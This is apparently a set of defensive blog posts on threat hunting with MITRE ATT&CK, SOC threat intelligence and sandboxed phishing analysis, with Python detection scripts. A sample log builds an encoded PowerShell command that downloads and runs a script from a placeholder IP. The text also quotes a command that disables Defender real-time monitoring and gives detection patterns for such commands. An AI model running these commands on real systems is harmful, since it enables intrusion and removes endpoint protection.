
The MITRE ATT&CK Framework has been one of the most popular methodologies in cybersecurity over the past few years. Cybersecurity tools come integrated with it, and cybersecurity leaders talk about it and expect their teams to know and leverage it in their day-to-day operations. Cybersecurity is an ever-changing field where threat actors come up with new strategies and techniques every single day to bypass security defenses and achieve their objectives. Attacker tradecraft is widely reported and researched by news agencies, threat intelligence teams and independent researchers around the world. For any cyber-defender, this "body of work" is a vast database which they can leverage to strengthen their operations. This threat research data, combined with an actionable knowledge of the MITRE ATT&CK Framework, can take their SOC operations to the next level. The objective of this write-up is to help them get there by introducing the relevant concepts and explaining the process step by step.


Part 1: Attack Data Collection


As a SOC Analyst or Blue Team member, one of the most valuable things to have is real-world attack data: the various attack types, and the extent and impact of those attacks. What are some effective ways to collect this critical data?


  • Cybersecurity News Websites: The Hacker News, Bleeping Computer, Cyber Security News, Cyware etc. are leading websites for collecting cyberattack and vulnerability data. The advantage of these websites is that they never miss the major attacks and are among the first to report them. Apart from that, they summarize the attack data into simple, easy-to-understand language which suits cybersecurity beginners and experienced practitioners alike. One thing to note is that these are primarily news-reporting websites. In their articles, you'll also find links to the original research (performed by other companies or individuals), so make sure not to miss the original research articles as well, in order to develop a deeper understanding of an attack or vulnerability.


  • RSS Feeds: Going to each and every news website and gathering information can become a strenuous and time-consuming process, and this is where RSS feeds come in handy. RSS is a web feed format which lets you subscribe to websites and receive new content from them without having to constantly visit those websites. Feedly is a very helpful RSS feed app. The advantage here is that you get all the major cyber news and updates from your favourite websites in one place.


  • Newsletters: Cybersecurity newsletters are a great way to collect the latest attack data without putting too much effort into gathering the info. My personal favourite in this area is the SANS NewsBites newsletter. It's a semi-weekly (twice a week) newsletter (it comes straight to your inbox if subscribed!) which covers the major cyberattacks and vulnerabilities of the week. The best part is that it's concise and to the point, contains commentary on each news piece from SANS experts (which helps you understand the historical context and importance of the news) and provides links to cybersecurity news websites for additional research.


  • Cyber-news Podcasts: Cyber-news podcasts are a great way to stay constantly updated on the latest news. Podcasts have the unique advantage that they fit in alongside your routine tasks, be it morning/evening walks, cooking or driving. SANS Stormcast is one of the best cyber news podcasts out there. Rather than just news reporting, it includes lots of insights, recommendations and discussion. At the same time, it's short and precise. CISO Series Cyber Security Headlines is another good option for gathering the latest attack information.

 

Part 2: MITRE ATT&CK Framework


The MITRE ATT&CK Framework is one of the most comprehensive and directly actionable frameworks we have within the cybersecurity domain. The ATT&CK Framework consists of 14 Tactics, and each Tactic has multiple Techniques and Sub-Techniques.

In simple terms:

  • Tactics can be compared to the different stages of the Cyber Kill Chain. They are basically the goals or objectives of the attackers. Examples of Tactics are Initial Access, Lateral Movement, Exfiltration etc.

  • Techniques are how that goal or objective can be achieved by the attacker, e.g. Initial Access into a target environment can be achieved through Spearphishing, Brute Force etc.

  • Then there are Procedures, which are real-world instances (cyberattacks) where specific techniques have been used by threat actors to compromise environments. Procedures are one of the most overlooked components of the ATT&CK Framework. A detailed study of procedures will help Blue Team and Red Team members understand real-world attacks in depth.


Each Technique page on the MITRE ATT&CK website contains detailed Detection and Mitigation steps, which are invaluable data for the Blue Team. The detection ideas on an ATT&CK page can be used in combination with the analytics rules detailed on the MITRE CAR website (another wonderful initiative from MITRE) to develop detection rules for your SIEM tool. A major point worth noting is that most high-profile attacks are not limited to just 1 or 2 tactics/techniques but are a combination of various tactics and techniques. In certain cases this might even extend to all 14 tactics in the ATT&CK Framework. No matter how sophisticated the adversary is, this framework provides cybersecurity teams with a logical pathway to investigate and uncover the trajectory of the attacker.


Part 3: Extract Relevant Threat Intel from Real Attack Data


In the previous two sections, we discussed the collection of real attack data and the concepts of the MITRE ATT&CK Framework. Obviously, no cyberattack news or framework is useful unless we can derive actionable intel from it in order to protect corporate environments. Let us explore some effective ways to extract relevant threat intel from real attack data.

  • Cyberattack News - "Reading between the lines": We've already discussed how to collect important cybersecurity news and attack-related data. Now, while reading such news articles (especially from news-reporting websites like The Hacker News, Bleeping Computer etc.), it's important not to stop at a superficial reading but to go deep and understand the attacker's kill chain stages, tactics, techniques and attack path.


  • In-Depth Threat Research References: Various threat intel teams disseminate in-depth threat research regularly.

    Some of the ones which shouldn't be missed are:

    1. CISA Threat Advisories

    2. Palo Alto Unit 42 Threat Research

    3. Mandiant (now part of Google Cloud) Threat Research

    4. Red Canary blogs

    5. Microsoft Threat Research


      1. Collecting IOCs

      The above-mentioned threat research blogs provide attacker IOCs, i.e. the IP addresses, domains, URLs and files (hashes) currently in use, or historically used, by threat actors to compromise company environments. Make a note of this valuable information.


      2. Collecting TTPs

      MITRE TTPs go even deeper than IOCs and track the modus operandi of the attackers. The above-mentioned threat research blogs detail the tactics and techniques used by the attackers. Make short notes of the attacker TTPs, including tools used, commands run etc.


      3. Prevention/Mitigation Recommendations

      These threat research articles also provide detailed attack prevention and mitigation recommendations which can be helpful in fortifying your defenses against specific attacks as well as improving your overall security posture.


Part 4: Unleash the Power of Collected Threat Intel with Proactive Threat Hunting


In parts 1 to 3, we explored how to collect real attack data, the relevance of the MITRE ATT&CK framework, and how to extract relevant threat intel from the collected attack data. Now it's time to leverage the collected threat intel to actively hunt adversaries in your environment. Let's look at some effective ways to perform proactive threat hunting.


  • Threat Hunting with IOCs: The IP addresses, domains, URLs, file hashes etc. of the malicious actor can be searched for in your SIEM tool using the format <field="value">. If the IOC list is long, it can be loaded as a watchlist/reference list and searched accordingly. If there are hits for IOCs in the logs, appropriate actions need to be taken, such as blocking the IPs and file hashes as well as analysing further malicious activity connected to those IOCs.


  • Threat Hunting with "Keywords": Searching with keywords can be a good starting point for TTP hunting. There are certain tools, commands and other attack patterns commonly seen under each attacker tactic. For example, encoded PowerShell is a common technique used by threat actors to achieve Defense Evasion. Searching for the keywords "powershell.exe -enc" as a regex in raw logs will help to find encoded PowerShell commands (in Google SecOps, "Legacy Search" can be used for this). Threat hunting with keywords also helps identify the field-value pairs which will be useful in the next step.


  • Developing Threat Hunting Rules: Once keywords have been searched for and field-value pairs identified, threat hunting rules can be developed to further fine-tune the process. For example, in Google SecOps, encoded PowerShell commands can be searched for using the query:

    principal.process.file.full_path = /powershell.exe$/ AND principal.process.command_line =/powershell.exe -enc/


    Additional conditions can be added to filter for just the malicious encoded PowerShell commands by analysing the base64 strings. Threat hunting rules can also be made repeatable by saving them as "Saved Searches" (Google SecOps).
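As an added example (not from the original article, and not a Google SecOps query), the following Python script runs both the IOC watchlist hunt and the encoded-PowerShell keyword hunt over raw log lines, and takes the base64 analysis one step further by decoding the -EncodedCommand blob (UTF-16LE) so that IOCs hidden inside it are matched as well; the watchlist, hosts and log lines are constructed placeholders.

```python
import base64
import re
from typing import Dict, List

# Constructed IOC watchlist (placeholder values, not taken from any threat report).
IOC_WATCHLIST = {
    "ip": {"198.51.100.23"},
    "domain": {"update-check.example.net"},
    "sha256": {"3d5a" * 16},  # made-up 64-hex-character hash
}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)
# A "-e..." switch followed by a base64 blob; the switch itself is validated in code below.
FLAG_RE = re.compile(r"\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(command: str) -> str:
    """Build the blob -EncodedCommand expects: the command as UTF-16LE, base64-encoded."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_powershell(blob: str):
    """Reverse encode_powershell(); return None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_iocs(text: str) -> List[Dict[str, str]]:
    """Return the watchlist IOCs (IP, domain, SHA-256) that appear in the text."""
    hits = []
    for kind, regex in (("ip", IP_RE), ("domain", DOMAIN_RE), ("sha256", SHA256_RE)):
        for value in regex.findall(text):
            if value.lower() in IOC_WATCHLIST[kind]:
                hits.append({"kind": kind, "value": value.lower()})
    return hits


def find_encoded_powershell(line: str) -> List[Dict[str, str]]:
    """Find -EncodedCommand invocations on a log line and decode them."""
    hits = []
    if "powershell" not in line.lower():
        return hits
    for match in FLAG_RE.finditer(line):
        flag, blob = match.group(1), match.group(2)
        # powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...);
        # other -e switches such as -ExecutionPolicy or -ErrorAction are skipped.
        if not "encodedcommand".startswith(flag.lower()):
            continue
        hits.append({"flag": "-" + flag, "decoded": decode_encoded_powershell(blob)})
    return hits


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Run the IOC and encoded-PowerShell hunts over raw log lines."""
    findings = []
    for number, line in enumerate(lines, 1):
        for ioc in find_iocs(line):
            findings.append({"line": number, "type": "ioc", **ioc})
        for enc in find_encoded_powershell(line):
            findings.append({"line": number, "type": "encoded_powershell", **enc})
            # IOCs inside the encoded command are invisible to a plain IOC search.
            for ioc in find_iocs(enc["decoded"] or ""):
                findings.append({"line": number, "type": "ioc_in_decoded", **ioc})
    return findings


# Constructed sample log lines (invented hosts and timestamps, not real telemetry).
SAMPLE_LOGS = [
    "2024-03-01T09:12:03Z host=WS01 src=10.0.0.5 dst=198.51.100.23 dport=443 action=allow",
    "2024-03-01T09:12:10Z host=WS01 dns query=update-check.example.net rcode=NOERROR",
    "2024-03-01T09:12:15Z host=WS01 cmd=\"powershell.exe -ExecutionPolicy Bypass -nop -w hidden -enc "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')")
    + "\"",
    "2024-03-01T09:13:00Z host=WS02 cmd=\"powershell.exe -File C:\\scripts\\backup.ps1\"",
    "2024-03-01T09:14:22Z host=WS01 file_created sha256=" + "3d5a" * 16,
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOGS):
        print(finding)
```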


  • "Automate it" - Feedback Loop to Detection Rules: The best part about threat hunting is that its findings create a feedback loop to Detection Rules. Once something malicious has been uncovered during threat hunting, the relevant teams need to be informed immediately so that they can take corrective action. The next logical step is to turn the findings into Detection Rules so that the malicious actor's movements are alerted on in future, even when a threat hunt for that actor is not active at that point in time.


If threat actors are refining their TTPs with each passing day, we as defenders need to be one step ahead, able to track them down and defeat their purpose. With the patterns they follow and the evidence they leave behind, they are, in a way, helping us develop the knowledge base which will in turn be used against them. The practices mentioned in this article are intended to help you in your fight against their might!

 
 
 

The Security Operations Center (SOC) is one of the most crucial components of cyber defense for any modern enterprise. No matter how many costly and popular cybersecurity tools a company has purchased, they are of little worth without efforts towards centralized log collection and a SOC team which can draw understanding from, and take actionable steps on, the vast pool of logs collected from the various log sources. But a question arises: can a SOC achieve its true potential without being updated on the latest cyberattacks and vulnerabilities?


Consider a situation where a SOC team member is going through the logs from a particular log source and comes across an attack pattern, for example multiple login failures from different geolocations seen in firewall logs. It seems to be a dictionary brute-force attack on the firewall management interface. Also consider that, subsequently, they go through a threat intelligence article which details an attack campaign targeting their firewall vendor's management interface via a critical vulnerability. The article also contains the malicious IoCs and other details of the attackers, the details of the vulnerability being targeted, the patch details for the vulnerability, and actionable steps to prevent a major incident in future. The SOC team member is alarmed by the critical exposure of the firewall management interface to the public and works closely with the Firewall Team to limit public access via a VPN. They also make sure the firewall has the latest patches. Additionally, they perform a threat hunt for the malicious IoCs and block any found within the company environment. They also create rules and dashboards to automate these detections in the future. This is where the power of Threat Intelligence comes in. While earlier it was just a brute-force attack detected in firewall logs, with added threat intel coverage its context expanded above and beyond and gave the SOC team lots of actionable steps to secure their enterprise.


What Really is Threat Intelligence?

So before going further, let's get a basic understanding of threat intelligence and its use cases.

In simple terms, threat intelligence is the art of knowing who your attackers or potential attackers are, and predicting their next move. Threat intelligence comes in various forms such as Tactical Threat Intelligence, Operational Threat Intelligence and Strategic Threat Intelligence. From a SOC perspective, the former two are more relevant, i.e. Tactical (IoC-based) and Operational (TTP-based) Threat Intelligence. Since tactical threat intelligence is based on IoCs (Indicators of Compromise), it's more volatile: IPs, domains, file hashes etc. will keep on changing, as the threat actor can easily change them in order to cover their tracks. So having relevant and up-to-date information is very important in tactical threat intelligence. Nowadays, what many SOC teams are doing wrong is overly relying on third-party TI feed integration and thinking that that's enough to tick the TI box. The problem with this approach is that many of the feeds ingested or IoCs received might not be relevant to you and will only increase the overall log ingestion into your SIEM tool. It could be outdated data, for example a "malicious" IP which is 3 months old and no longer used by the attacker, or a domain which targets an entirely different country or industry from yours. These are irrelevant data for your organization. Operational Threat Intelligence relies on attacker TTPs (Tactics, Techniques & Procedures), which have a longer lifespan compared to IOCs. This is because TTPs are basically attacker behaviours, which don't change overnight, for example a threat actor using a specific phishing lure for initial access, or a specific C2 protocol for data exfiltration. The best practice for SOC teams is to use a combination of tactical and operational threat intelligence for maximum effectiveness.


Relevant Threat Intel

Threat Intelligence in its true form is always relevant and that's particularly so when some of the below conditions are met:

- Relevant to your industry: for example, a specific ransomware targeting the healthcare industry.

- Relevant to your region: cybercrime targeting your company's operational region.

- Technology-specific threats: critical vulnerabilities present in, or attacks targeting, your technology stack, be it the operating system used, or the Windows or third-party applications deployed.


How to gather Threat Intelligence

The best thing to have is your own threat intelligence team which actively researches the open, deep and dark web to gather data on critical threats. If your company doesn't have that bandwidth, lots of proactive threat intel teams across the world disseminate critical threat research data for free on a periodic basis. Some of the best threat intel teams in the industry are:


Each of these vendors is a leader in threat research, and their articles go into great depth on the vulnerabilities, how they're exploited, related IoCs etc. If mapped correctly to the parameters for relevant threat intel discussed previously, this information can provide invaluable input to companies looking to improve their overall security posture.


How to Leverage Threat Intelligence in SOC Monitoring?

Even though threat intelligence is one of the most powerful assets for any blue team, it's one of the most underutilized powers in many companies, even to the extent that many cybersecurity companies simply see it as a marketing exercise limited to sending weekly Threat Intel Newsletters to their existing/prospective clients. But here's a fundamental thought which might help reiterate the importance of threat intel: if defenders are not well-informed about the latest cyberattacks or vulnerabilities, how efficient will they be? Is the purpose of a SOC just to check the compliance boxes and get drowned in redundant false positive alerts? If the answer is a big NO, let's discuss some ways to effectively leverage the valuable information extracted from threat intelligence to empower SOC operations.


Threat Hunting with IOCs

The easiest and best way to start leveraging threat intelligence is to perform a threat hunt with the IOCs collected from the threat intel. This is the tactical threat intel area which we discussed previously. In this stage, we check whether there were any connection attempts (allowed/blocked) from the malicious IPs towards our company environment, any malicious hashes (files) observed in the endpoint logs, malicious domain connections observed from any of the endpoints etc. If allowed connections are observed, further investigation is required, including checking the bytes transferred, any return connections, file executions, file drops in unusual locations, further inbound/outbound connections targeting vulnerable ports etc. Remediation actions can start with blocking the malicious IoCs and then taking further steps as required according to how the investigation unfolds.


Threat hunting focused on TTPs

Here, we leverage the Operational Threat Intelligence discussed earlier, wherein we focus on the attacker's tactics, techniques and procedures (TTPs).

Consider a threat actor who uses a specific phishing lure, i.e. Christmas-themed giveaway emails (Initial Access). The email contains a Word file attachment which, when opened, contains macros which need to be enabled to view the content. Upon enabling macros, a PowerShell script gets downloaded and run. The PowerShell script checks user privileges (Discovery), disables the real-time protection in Windows Defender (Defense Evasion), attempts to download and install the WinSCP software (Execution), and compresses and sends data to a remote server using WinSCP (Data Exfiltration). Many of these tactics/techniques are common across threat actors and can be spotted using threat hunting rules that contain command-line keywords from these activities.

For example, disabling real-time monitoring is performed using the following command in PowerShell:

Set-MpPreference -DisableRealtimeMonitoring $true

Such attempts can be spotted by searching for command lines in Sysmon/EDR logs with the keyword "DisableRealtimeMonitoring".

 

Obviously, such activity might overlap with valid admin activity, which is why hunting and log analysis shouldn't be limited to just a few command lines or IP connections; the search window should be broadened to analyse what happened before and after the suspicious activity. If it's a case of a compromised admin account, you'll most probably see something unexpected or absurd happening that a normal admin account wouldn't do.
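As an added example (not part of the original post), the following Python script performs the "DisableRealtimeMonitoring" keyword hunt over constructed Sysmon-style process-creation events and, as recommended above, pulls the events before and after each hit on the same host so that a macro-driven chain can be told apart from an admin who ran the same command; hosts, users, paths and timestamps are invented.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Real-time protection being switched off, via Set-MpPreference or Add-MpPreference.
TAMPER_RE = re.compile(r"disablerealtimemonitoring\s+(?:\$true|1)\b", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed Sysmon-style process-creation events (invented hosts, users and times).
EVENTS = [
    {"ts": "2024-03-01T09:01:05", "host": "WS07", "user": "CORP\\jdoe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmd": "powershell.exe -nop -w hidden -c whoami /groups"},
    {"ts": "2024-03-01T09:01:12", "host": "WS07", "user": "CORP\\jdoe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmd": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2024-03-01T09:02:40", "host": "WS07", "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\WinSCP.exe /console /script=up.txt"},
    {"ts": "2024-03-01T14:20:00", "host": "SRV02", "user": "CORP\\adm.kim",
     "parent": "C:\\Windows\\explorer.exe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2024-03-01T14:20:30", "host": "SRV02", "user": "CORP\\adm.kim",
     "parent": "C:\\Windows\\explorer.exe",
     "cmd": "msiexec.exe /i C:\\Install\\monitoring-agent.msi /qn"},
    {"ts": "2024-03-01T14:25:00", "host": "SRV02", "user": "CORP\\adm.kim",
     "parent": "C:\\Windows\\explorer.exe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false"},
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def find_defender_tampering(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """The keyword hunt: every command line that turns real-time monitoring off."""
    return [e for e in events if TAMPER_RE.search(e["cmd"])]


def context_window(events, hit, minutes: int = 10) -> List[Dict[str, str]]:
    """Everything on the same host within +/- minutes of the hit, in time order."""
    centre = parse_ts(hit["ts"])
    delta = timedelta(minutes=minutes)
    window = [e for e in events
              if e["host"] == hit["host"] and abs(parse_ts(e["ts"]) - centre) <= delta]
    return sorted(window, key=lambda e: e["ts"])


def triage(events, hit, minutes: int = 10) -> Dict[str, object]:
    """Judge the hit by what happened around it rather than by the one command line."""
    context = context_window(events, hit, minutes)
    others = [e for e in context if e is not hit]
    reasons = []
    if hit["parent"].rsplit("\\", 1)[-1].lower() in OFFICE_APPS:
        reasons.append("launched by an Office application (macro-style parent)")
    if any("whoami" in e["cmd"].lower() for e in others):
        reasons.append("privilege discovery in the same window")
    if any("winscp" in e["cmd"].lower() for e in others):
        reasons.append("file-transfer tool started in the same window")
    # A bare hit with no supporting activity still goes to a human, never auto-closed.
    verdict = "suspicious" if reasons else "needs_review"
    return {"host": hit["host"], "user": hit["user"], "ts": hit["ts"],
            "verdict": verdict, "reasons": reasons,
            "timeline": [f'{e["ts"]} {e["cmd"]}' for e in context]}


if __name__ == "__main__":
    for hit in find_defender_tampering(EVENTS):
        print(triage(EVENTS, hit))
```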


Detection Rules

Now consider that we have performed threat hunting based on relevant threat intel for our company and made sure that there's no imminent threat targeting our firm. But what if something happens later, when we're not performing hunting? What if the SOC team has shifted its focus to another major threat actor which is targeting its geographical area, and the previous threat actor takes advantage of this opportunity? So we need a means to automate the process of getting alerted when it matters, i.e. we need Detection Rules. Detection rules can also be IoC-based or TTP-based. IoC-based rules might be helpful to detect a specific threat actor's presence in company environments but are often short-lived. TTP-based rules can prove helpful to detect different threat actors since, as discussed earlier, many threat actors share similar tactics/techniques.


Dashboards

Building dashboards to monitor attack trends is another helpful way to evaluate the overall security posture of your firm. Dashboards provide a bird's-eye view of the key metrics that help both the SOC team and the C-level executive team alike. The SOC team gains visibility into critical vulnerabilities and threats looming over their enterprise, which can be further investigated in depth via log analysis and threat hunting, and automated using detection rules. The CISO can take major strategic decisions based on the visible company exposure and by identifying areas which require higher cybersecurity investment.

 

It's high time to make a major shift from viewing threat intelligence as a fashionable marketing term, seldom used realistically in cyber defense, to treating it as an essential powerhouse of a SOC team. Relevant and actionable threat intel coupled with well-devised SOC processes will be a real force to be reckoned with! It's time to de-glamorize and expose the cybercrime space, which is filled with crooks who rejoice in others' misery and think they can get away with it. A threat-intel powered SOC shows the way forward!!

 
 
 


In Parts 1 and 2, we covered two areas within static analysis of a phishing mail. In this final part, we're moving on to Dynamic Analysis, where we execute and interact with the malware embedded in malicious mails.


What is Email Dynamic Analysis?

Dynamic analysis of phishing mails is used to examine and understand the behavior of phishing emails in real-time. Dynamic analysis involves studying the behavior of an email when it is opened or interacted with, as opposed to static analysis, which examines the email's content and code without executing it.

Here are some key aspects of phishing email dynamic analysis:


Behavior Monitoring

Analysts observe the behavior of the email when opened or interacted with, including any attempts to connect to external servers, download malicious content, or execute malicious scripts.

Sandboxing

Phishing emails are often analyzed in a controlled environment known as a sandbox. Sandboxing involves running the email in an isolated environment to monitor its actions without risking harm to the actual system.

Code Execution Analysis

Analysts examine any scripts or code embedded in the email to understand their purpose and potential malicious activities. This includes looking for attempts to exploit vulnerabilities or execute malicious commands.

Payload Analysis

If the email contains attachments, dynamic analysis involves examining the payload (e.g., malicious files, documents, or executables) to understand their functionality and potential impact on the system.

Dynamic URL Analysis

If the email includes hyperlinks, dynamic analysis involves checking the behavior of these URLs when clicked, including redirection to malicious sites or attempts to download malicious content.

Malware Detection

Dynamic analysis helps identify and detect any malware associated with the phishing email. This can include traditional malware or more sophisticated types such as ransomware.


Dynamic Analysis Tools

Let’s explore some effective tools which can be utilized to perform dynamic analysis on phishing mails.

Virtual Machines

Virtual machines hosted on personal devices are one of the preferred ways of analyzing malware. You can use the virtualization vendor of your choice (e.g. VirtualBox, VMware etc.). For the OS, it's suggested to have Linux as the host OS and Windows as the guest OS. Most malware targets Windows, so it's the best choice of guest OS for successfully simulating a malware infection. Also, since the host OS is Linux, Windows-targeted malware will be ineffective even if it escapes the guest OS into the host.


ANY.RUN

ANY.RUN is one of the leading online malware sandbox solutions on the market. The advantage of ANY.RUN is that it is fully interactive, i.e. suppose an Excel file needs to be uploaded and then macros need to be enabled within the file to activate the malware; all of that can be performed safely within ANY.RUN's online virtual machine. Also, there are lots of customization options for the online VM such as OS version, browser, network etc. The free version has some limitations, such as a time limit of 1 min with extra added time of max. 4 mins, availability of public tasks only (which means all browsed data will be public), and Windows 7 as the only available OS, to name a few.

SquareX

SquareX is a revolutionary cybersecurity tool with multiple features such as a disposable browser, disposable file viewer and disposable email. Using SquareX is as simple as opening a new tab in your browser. SquareX just requires you to open their browser extension or web app, spin up their disposable browser or file viewer and then start analyzing the malicious URL or attachment which you're after. Each session lasts for 10 mins and can be extended by an additional 10 mins any number of times.

Browserling

Browserling is an online cross-browser testing tool which can be used as a URL sandbox. Enter the suspicious URL which needs to be analyzed, select the OS, browser and browser version of your choice and proceed. The free version is limited to Windows 10, a 3 min. time limit etc., to name a few.


Sample Analysis

Now, let's perform a sample analysis of a malicious mail with one of the dynamic analysis tools which we discussed above.


The email pretends to come from Amazon support and mentions that an "imaginary" card associated with the mail recipient's Prime membership is no longer valid and that the card details need to be updated. The email uses an urgency tactic by stressing that the update should be done within 1 day. The email further directs the recipient to open the email attachment for details.

We've downloaded the .docx attachment to a VM and, for further protection, we're using the ANY.RUN sandbox to open the attachment and view its details.

The document contains similar information to that seen in the email body. Two URLs have been included for updating the ("imaginary") card details. When we hover over both links, it's clear that both are the same and point to "qrco[.]de/beGfog", which is a QR code generator website. We click on the link and it opens in a browser within the ANY.RUN sandbox.
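The hover check can also be reproduced without rendering the document at all, since a .docx is a zip package whose link targets live in word/_rels/document.xml.rels. As an added example (not from the original post), the following Python script builds a constructed attachment mirroring this one (two visible links, same target, made-up redirector domain), lists every external hyperlink with its defanged target, and flags link text that looks like a URL but points at a different host.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def build_sample_docx() -> bytes:
    """Constructed minimal .docx: two visible links, one dressed up as an Amazon URL,
    both resolving to the same made-up redirector target (placeholder domain)."""
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:body>'
        '<w:p><w:r><w:t>Your card is no longer valid. Update it within 1 day.</w:t></w:r></w:p>'
        '<w:p><w:hyperlink r:id="rId1"><w:r><w:t>https://www.amazon.com/account</w:t></w:r></w:hyperlink></w:p>'
        '<w:p><w:hyperlink r:id="rId2"><w:r><w:t>Update card details</w:t></w:r></w:hyperlink></w:p>'
        '</w:body></w:document>'
    )
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{R_NS}/hyperlink" Target="https://qr-redirect.example/beGfog" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{R_NS}/hyperlink" Target="https://qr-redirect.example/beGfog" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{R_NS}/styles" Target="styles.xml"/>'
        '</Relationships>'
    )
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("word/document.xml", document)
        package.writestr("word/_rels/document.xml.rels", rels)
    return buffer.getvalue()


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked by accident (hxxp / [.] convention)."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def host_of(url: str) -> str:
    if "://" not in url:
        url = "//" + url
    return (urlsplit(url).hostname or "").lower()


def extract_hyperlinks(docx_bytes: bytes) -> List[Dict[str, object]]:
    """List every external hyperlink in the document body without rendering it."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        rels_root = ET.fromstring(package.read("word/_rels/document.xml.rels"))
        doc_root = ET.fromstring(package.read("word/document.xml"))
    # Word keeps link targets in the rels part, keyed by the r:id used in the body.
    targets = {
        rel.get("Id"): rel.get("Target")
        for rel in rels_root.iter(f"{{{RELS_NS}}}Relationship")
        if rel.get("TargetMode") == "External"
    }
    links = []
    for link in doc_root.iter(f"{{{W_NS}}}hyperlink"):
        target = targets.get(link.get(f"{{{R_NS}}}id"))
        if target is None:
            continue
        text = "".join(t.text or "" for t in link.iter(f"{{{W_NS}}}t"))
        # Display text that looks like a URL but points at another host is a classic lure.
        looks_like_url = re.match(r"(?i)^(?:https?://|www\.)", text) is not None
        links.append({
            "text": text,
            "target": target,
            "defanged": defang(target),
            "text_mismatch": looks_like_url and host_of(text) != host_of(target),
        })
    return links


if __name__ == "__main__":
    for link in extract_hyperlinks(build_sample_docx()):
        print(link)
```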


The webpage says "The QR Code Campaign has been disabled for some reason". This indicates that this webpage previously hosted a QR code which, when scanned, might have taken the victim to an attacker-controlled website set up to steal the victim's credentials. Later, the malicious website may have been taken down by law enforcement or deleted by the attackers themselves, which is why the QR code has been disabled.

Finally, we've successfully covered the various ways of analyzing phishing mails. The evolution of phishing has taken a concerning turn with the incorporation of AI, enabling attackers to create more convincing and adaptive phishing campaigns. Highly sophisticated phishing, despite its complexity, has become easily accessible due to the widespread availability of phishing kits and phishing-as-a-service options on the dark web, enabling cybercriminals to orchestrate attacks with minimal technical expertise. But the fact is that however sophisticated a phishing attempt is, there'll still be some loopholes which help uncover the threat, as in the case of any criminal act. It is imperative for cybersecurity professionals to master diverse methods of analyzing phishing mails rather than relying solely on grammatical errors or hovering over links. Such knowledge will empower even a common end user of the internet to make informed decisions by correctly identifying phishing threats without seeking external assistance.


For any concerns or queries, hit me up on LinkedIn or Twitter

 
 
 